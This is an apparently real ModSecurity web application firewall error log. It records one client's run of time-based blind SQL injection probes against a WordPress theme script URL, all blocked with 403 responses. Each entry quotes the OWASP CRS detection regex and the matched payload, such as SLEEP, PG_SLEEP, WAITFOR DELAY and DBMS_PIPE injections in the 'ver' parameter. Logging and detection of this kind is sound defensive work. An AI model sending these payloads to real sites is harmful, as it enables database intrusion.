"(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(111)||CHR(120)||CHR(118),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSqg1rY6w-xq1eShSVAAAAFg"] [Fri Jul 12 08:36:11.584727 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:38018] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(111)||CHR(120)||CHR(118),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSxoAeojmxWlFps7wngAAAM8"] [Fri Jul 12 08:36:11.839499 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:38020] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47) AND SLEEP(5) AND (8270=8270"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSxoAeojmxWlFps7wnwAAAME"] [Fri Jul 12 08:36:12.076111 2024] [:error] [pid 29519:tid 139783720359680] [client 141.98.81.44:38022] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTDEhNOprNgeRyDcP6gAAAJE"] [Fri Jul 12 08:36:12.337767 2024] [:error] [pid 30143:tid 139783916037888] [client 141.98.81.44:38024] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47') AND SLEEP(5) AND ('qxAe'='qxAe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTBoAeojmxWlFps7woAAAAMI"] [Fri Jul 12 08:36:12.590312 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:38026] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47' AND SLEEP(5) AND 'JUJg'='JUJg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTBoAeojmxWlFps7woQAAANg"] [Fri Jul 12 08:36:13.486054 2024] [:error] [pid 29519:tid 139783924430592] [client 141.98.81.44:38028] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTTEhNOprNgeRyDcP6wAAAIE"] [Fri Jul 12 08:36:13.730195 2024] [:error] [pid 29519:tid 139783711966976] [client 141.98.81.44:38030] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)-- CrBi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTTEhNOprNgeRyDcP7AAAAJI"] [Fri Jul 12 08:36:13.982967 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:38032] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47) AND 4348=(SELECT 4348 FROM PG_SLEEP(5)) AND (1093=1093"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTRoAeojmxWlFps7wogAAANQ"] [Fri Jul 12 08:36:14.234199 2024] [:error] [pid 29517:tid 139783779108608] [client 141.98.81.44:38034] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 4348=(SELECT 4348 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTvUCh5vf5PuAcijj9QAAAAo"] [Fri Jul 12 08:36:14.478037 2024] [:error] [pid 30143:tid 139783795894016] [client 141.98.81.44:38036] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47') AND 4348=(SELECT 4348 FROM PG_SLEEP(5)) AND ('BBLB'='BBLB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExThoAeojmxWlFps7wowAAAMg"] [Fri Jul 12 08:36:14.728339 2024] [:error] [pid 30143:tid 139783678396160] [client 141.98.81.44:38038] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47' AND 4348=(SELECT 4348 FROM PG_SLEEP(5)) AND 'cRDb'='cRDb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExThoAeojmxWlFps7wpAAAANY"] [Fri Jul 12 08:36:14.980830 2024] [:error] [pid 29518:tid 139783916037888] [client 141.98.81.44:38040] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%' AND 4348=(SELECT 4348 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTqg1rY6w-xq1eShSVQAAAEI"] [Fri Jul 12 08:36:15.218428 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:38042] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 4348=(SELECT 4348 FROM PG_SLEEP(5))-- wXen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTxoAeojmxWlFps7wpQAAAMU"] [Fri Jul 12 08:36:15.470433 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:38044] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47) WAITFOR DELAY '0:0:5' AND (6526=6526"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExTxoAeojmxWlFps7wpgAAAMw"] [Fri Jul 12 08:36:15.716572 2024] [:error] [pid 29517:tid 139783916037888] [client 141.98.81.44:38046] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExT_UCh5vf5PuAcijj9gAAAAI"] [Fri Jul 12 08:36:15.958599 2024] [:error] [pid 29518:tid 139783907645184] [client 141.98.81.44:38048] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47') WAITFOR DELAY '0:0:5' AND ('LYae'='LYae"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExT6g1rY6w-xq1eShSVgAAAEM"] [Fri Jul 12 08:36:16.222105 2024] [:error] [pid 30143:tid 139783882467072] [client 141.98.81.44:38050] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47' WAITFOR DELAY '0:0:5' AND 'gMCX'='gMCX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUBoAeojmxWlFps7wpwAAAMY"] [Fri Jul 12 08:36:16.486680 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:38052] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUBoAeojmxWlFps7wqAAAAMc"] [Fri Jul 12 08:36:16.738446 2024] [:error] [pid 29518:tid 139783882467072] [client 141.98.81.44:38054] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'-- oMiH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUKg1rY6w-xq1eShSVwAAAEY"] [Fri Jul 12 08:36:17.049932 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38056] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5) AND (3008=3008"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExURoAeojmxWlFps7wqQAAAM4"] [Fri Jul 12 08:36:17.374208 2024] [:error] [pid 30143:tid 139783703574272] [client 141.98.81.44:38058] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 